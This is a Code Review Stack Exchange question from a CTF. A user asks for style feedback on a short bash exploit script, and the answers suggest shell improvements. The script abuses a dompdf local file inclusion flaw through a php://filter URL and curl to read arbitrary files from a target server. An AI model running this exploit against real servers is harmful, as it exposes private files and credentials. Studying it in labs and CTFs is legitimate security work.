Dompdf LFI (Local File Inclusion)

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0;







up vote
2
down vote

favorite












Intro



During a CTF I encountered a dompdf LFI vulnerability, which is explained at exploitdb.



However when I executed that vulnerability it gave it to me in PDF form, and it was a pain to constantly (read, strip, and base64 decode) to read the contents of files. So I made a little bash script to do these things automatically.



I am happy with the result, but I thought there maybe was a way to resolve those double sed into one Regex capture. It works because the [( ... )] is unique in the resulting string.



Code



#!/bin/bash
if [ -z "$1" ] || [ -z "$2" ]; then
 echo "Usage ./read_dompdf [url_to_dompdf] [path/to/file]"; exit
fi
URL="$1/dompdf.php?input_file=php://filter/convert.base64-encode/resource=$2"
echo `curl --silent $URL` | sed 's/.*[(//' | sed 's/)].*//' | base64 -d



bash




share|improve this question





















  • I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
    – Daniel
    Apr 15 at 16:43










  • @Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
    – Ludisposed
    Apr 15 at 16:49
















up vote
2
down vote

favorite












Intro



During a CTF I encountered a dompdf LFI vulnerability, which is explained at exploitdb.



However when I executed that vulnerability it gave it to me in PDF form, and it was a pain to constantly (read, strip, and base64 decode) to read the contents of files. So I made a little bash script to do these things automatically.



I am happy with the result, but I thought there maybe was a way to resolve those double sed into one Regex capture. It works because the [( ... )] is unique in the resulting string.



Code



#!/bin/bash
if [ -z "$1" ] || [ -z "$2" ]; then
 echo "Usage ./read_dompdf [url_to_dompdf] [path/to/file]"; exit
fi
URL="$1/dompdf.php?input_file=php://filter/convert.base64-encode/resource=$2"
echo `curl --silent $URL` | sed 's/.*[(//' | sed 's/)].*//' | base64 -d



bash




share|improve this question





















  • I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
    – Daniel
    Apr 15 at 16:43










  • @Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
    – Ludisposed
    Apr 15 at 16:49












up vote
2
down vote

favorite









up vote
2
down vote

favorite











Intro



During a CTF I encountered a dompdf LFI vulnerability, which is explained at exploitdb.



However when I executed that vulnerability it gave it to me in PDF form, and it was a pain to constantly (read, strip, and base64 decode) to read the contents of files. So I made a little bash script to do these things automatically.



I am happy with the result, but I thought there maybe was a way to resolve those double sed into one Regex capture. It works because the [( ... )] is unique in the resulting string.



Code



#!/bin/bash
if [ -z "$1" ] || [ -z "$2" ]; then
 echo "Usage ./read_dompdf [url_to_dompdf] [path/to/file]"; exit
fi
URL="$1/dompdf.php?input_file=php://filter/convert.base64-encode/resource=$2"
echo `curl --silent $URL` | sed 's/.*[(//' | sed 's/)].*//' | base64 -d



bash




share|improve this question













Intro



During a CTF I encountered a dompdf LFI vulnerability, which is explained at exploitdb.



However when I executed that vulnerability it gave it to me in PDF form, and it was a pain to constantly (read, strip, and base64 decode) to read the contents of files. So I made a little bash script to do these things automatically.



I am happy with the result, but I thought there maybe was a way to resolve those double sed into one Regex capture. It works because the [( ... )] is unique in the resulting string.



Code



#!/bin/bash
if [ -z "$1" ] || [ -z "$2" ]; then
 echo "Usage ./read_dompdf [url_to_dompdf] [path/to/file]"; exit
fi
URL="$1/dompdf.php?input_file=php://filter/convert.base64-encode/resource=$2"
echo `curl --silent $URL` | sed 's/.*[(//' | sed 's/)].*//' | base64 -d




bash





share|improve this question












share|improve this question




share|improve this question








edited Apr 15 at 16:48
























asked Apr 4 at 8:06









Ludisposed

5,71121657




5,71121657











  • I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
    – Daniel
    Apr 15 at 16:43










  • @Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
    – Ludisposed
    Apr 15 at 16:49
















  • I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
    – Daniel
    Apr 15 at 16:43










  • @Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
    – Ludisposed
    Apr 15 at 16:49















I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
– Daniel
Apr 15 at 16:43




I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.
– Daniel
Apr 15 at 16:43












@Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
– Ludisposed
Apr 15 at 16:49




@Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx
– Ludisposed
Apr 15 at 16:49










1 Answer
1






active

oldest

votes

















up vote
3
down vote



accepted










Input validation



I find this an unusual way to validate script parameters:




if [ -z "$1" ] || [ -z "$2" ]; then



It's more common to verify that there are exactly two parameters:



if [ $# != 2 ]; then


Note that this is not exactly the same as the original.
The original verifies that neither $1 and $2 is empty,
and it silently allows more than 2 parameters.



Why echo a sub-shell?



What is the purpose of this echo:




echo `curl --silent $URL`



Instead of simply:



curl --silent $URL


If the purpose is to join multiple lines into one, I would use tr instead:



curl --silent "$URL" | tr -d 'n'
# or
curl --silent "$URL" | tr 'n' ' '


Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the $URL used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.



One sed to rule them all



Instead of this:




sed 's/.*[(//' | sed 's/)].*//'



You can do multiple expressions with a single sed using multiple -e parameters:



sed -e 's/.*[(//' -e 's/)].*//'


I use the -e even with single expressions,
for maximum clarity.






share|improve this answer





















  • The echo might be to compress whitespace, or to expand globs... (probably not).
    – Toby Speight
    Apr 11 at 22:00










Your Answer




StackExchange.ifUsing("editor", function ()
return StackExchange.using("mathjaxEditing", function ()
StackExchange.MarkdownEditor.creationCallbacks.add(function (editor, postfix)
StackExchange.mathjaxEditing.prepareWmdForMathJax(editor, postfix, [["\$", "\$"]]);
);
);
, "mathjax-editing");

StackExchange.ifUsing("editor", function ()
StackExchange.using("externalEditor", function ()
StackExchange.using("snippets", function ()
StackExchange.snippets.init();
);
);
, "code-snippets");

StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "196"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
convertImagesToLinks: false,
noModals: false,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);








 

draft saved


draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fcodereview.stackexchange.com%2fquestions%2f191225%2fdompdf-lfi-local-file-inclusion%23new-answer', 'question_page');

);

Post as a guest

















1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes








up vote
3
down vote



accepted










Input validation



I find this an unusual way to validate script parameters:




if [ -z "$1" ] || [ -z "$2" ]; then



It's more common to verify that there are exactly two parameters:



if [ $# != 2 ]; then


Note that this is not exactly the same as the original.
The original verifies that neither $1 and $2 is empty,
and it silently allows more than 2 parameters.



Why echo a sub-shell?



What is the purpose of this echo:




echo `curl --silent $URL`



Instead of simply:



curl --silent $URL


If the purpose is to join multiple lines into one, I would use tr instead:



curl --silent "$URL" | tr -d 'n'
# or
curl --silent "$URL" | tr 'n' ' '


Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the $URL used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.



One sed to rule them all



Instead of this:




sed 's/.*[(//' | sed 's/)].*//'



You can do multiple expressions with a single sed using multiple -e parameters:



sed -e 's/.*[(//' -e 's/)].*//'


I use the -e even with single expressions,
for maximum clarity.






share|improve this answer





















  • The echo might be to compress whitespace, or to expand globs... (probably not).
    – Toby Speight
    Apr 11 at 22:00














up vote
3
down vote



accepted










Input validation



I find this an unusual way to validate script parameters:




if [ -z "$1" ] || [ -z "$2" ]; then



It's more common to verify that there are exactly two parameters:



if [ $# != 2 ]; then


Note that this is not exactly the same as the original.
The original verifies that neither $1 and $2 is empty,
and it silently allows more than 2 parameters.



Why echo a sub-shell?



What is the purpose of this echo:




echo `curl --silent $URL`



Instead of simply:



curl --silent $URL


If the purpose is to join multiple lines into one, I would use tr instead:



curl --silent "$URL" | tr -d 'n'
# or
curl --silent "$URL" | tr 'n' ' '


Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the $URL used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.



One sed to rule them all



Instead of this:




sed 's/.*[(//' | sed 's/)].*//'



You can do multiple expressions with a single sed using multiple -e parameters:



sed -e 's/.*[(//' -e 's/)].*//'


I use the -e even with single expressions,
for maximum clarity.






share|improve this answer





















  • The echo might be to compress whitespace, or to expand globs... (probably not).
    – Toby Speight
    Apr 11 at 22:00












up vote
3
down vote



accepted







up vote
3
down vote



accepted






Input validation



I find this an unusual way to validate script parameters:




if [ -z "$1" ] || [ -z "$2" ]; then



It's more common to verify that there are exactly two parameters:



if [ $# != 2 ]; then


Note that this is not exactly the same as the original.
The original verifies that neither $1 and $2 is empty,
and it silently allows more than 2 parameters.



Why echo a sub-shell?



What is the purpose of this echo:




echo `curl --silent $URL`



Instead of simply:



curl --silent $URL


If the purpose is to join multiple lines into one, I would use tr instead:



curl --silent "$URL" | tr -d 'n'
# or
curl --silent "$URL" | tr 'n' ' '


Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the $URL used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.



One sed to rule them all



Instead of this:




sed 's/.*[(//' | sed 's/)].*//'



You can do multiple expressions with a single sed using multiple -e parameters:



sed -e 's/.*[(//' -e 's/)].*//'


I use the -e even with single expressions,
for maximum clarity.






share|improve this answer













Input validation



I find this an unusual way to validate script parameters:




if [ -z "$1" ] || [ -z "$2" ]; then



It's more common to verify that there are exactly two parameters:



if [ $# != 2 ]; then


Note that this is not exactly the same as the original.
The original verifies that neither $1 and $2 is empty,
and it silently allows more than 2 parameters.



Why echo a sub-shell?



What is the purpose of this echo:




echo `curl --silent $URL`



Instead of simply:



curl --silent $URL


If the purpose is to join multiple lines into one, I would use tr instead:



curl --silent "$URL" | tr -d 'n'
# or
curl --silent "$URL" | tr 'n' ' '


Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the $URL used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.



One sed to rule them all



Instead of this:




sed 's/.*[(//' | sed 's/)].*//'



You can do multiple expressions with a single sed using multiple -e parameters:



sed -e 's/.*[(//' -e 's/)].*//'


I use the -e even with single expressions,
for maximum clarity.







share|improve this answer













share|improve this answer



share|improve this answer











answered Apr 6 at 21:25









janos

95.5k12120343




95.5k12120343











  • The echo might be to compress whitespace, or to expand globs... (probably not).
    – Toby Speight
    Apr 11 at 22:00
















  • The echo might be to compress whitespace, or to expand globs... (probably not).
    – Toby Speight
    Apr 11 at 22:00















The echo might be to compress whitespace, or to expand globs... (probably not).
– Toby Speight
Apr 11 at 22:00




The echo might be to compress whitespace, or to expand globs... (probably not).
– Toby Speight
Apr 11 at 22:00












 

draft saved


draft discarded


























 


draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fcodereview.stackexchange.com%2fquestions%2f191225%2fdompdf-lfi-local-file-inclusion%23new-answer', 'question_page');

);

Post as a guest
































































-

Popular posts from this blog

Chat program with C++ and SFML

Image
Clash Royale CLAN TAG #URR8PPP .everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0; up vote 2 down vote favorite This is my client code: (My server is very similar at the moment but I will upload it below this one just in case somebody wants to run it) #include <SFML/Graphics.hpp> #include <SFML/Network.hpp> #include <thread> int main() sf::RenderWindow main_win(sf::VideoMode(800, 800), "Chatcy!"); main_win.setPosition(sf::Vector2i(sf::VideoMode::getDesktopMode().width/2 -400, sf::VideoMode::getDesktopMode().height/2 -400)); main_win.setVerticalSyncEnabled(true); //chatcy logo sf::Texture chatcy; chatcy.loadFromFile("image_chatcy.png"); sf::Sprite logo; logo.setTexture(chatcy); //200x800 //font sf::Font font; font.loadFromFile("FreeSerif.ttf"); //name sf::String name("Client"); name += ": "; //text input area and background sf::RectangleShape in_backg
Read more

Function to Return a JSON Like Objects Using VBA Collections and Arrays

Image
Clash Royale CLAN TAG #URR8PPP .everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0; up vote 1 down vote favorite My goal is to create a compact function that can create a JSON Like object from JSON string. I want a function with a small footprint that I or anyone who wants to use it, can simply paste into a module and use. At 61 lines of code, I am happy with its size and portability. Here is an image of JSON Object created from string data using a ScriptControl . Although the Locals Window displays the properties and values correctly, the object itself is extremely difficult to work with. This image shows an object created using getJSONCollection . Because it is made of VBA Collections and Arrays, it is very easy to work with. Option Explicit Private Function getJSONCollection(ByVal Value As Variant, Optional ScriptEngine As Object) As Variant Const DELIMITER As String = "||" Dim col As Collection, JSON As Object, KeyNam
Read more

Will my employers contract hold up in court?

Image
Clash Royale CLAN TAG #URR8PPP up vote 8 down vote favorite 2 When I started a new job back in July of 2017, I signed a contract that had the following bindings or restrictions if I was ever to leave the company: Cannot work for a competitor within 25 miles of current companies location for the next two years Cannot offer my services to any organization within 25 miles of current companies location for the next two years Now, when mentioned “my services” this can be related to my profession of website design. This contract seems incredibly binding, 2 years in length, and I’m looking to see if it would actually hold up in an Arizona court. contract employment non-compete arizona share | improve this question edited Aug 7 at 15:35 feetwet ♦ 13.8k 9 37 85 asked Aug 6 at 19:05 Alex S. 46 2 What does your company do and what services do they provide? What is your role (i.e. internal work or work for customers).
Read more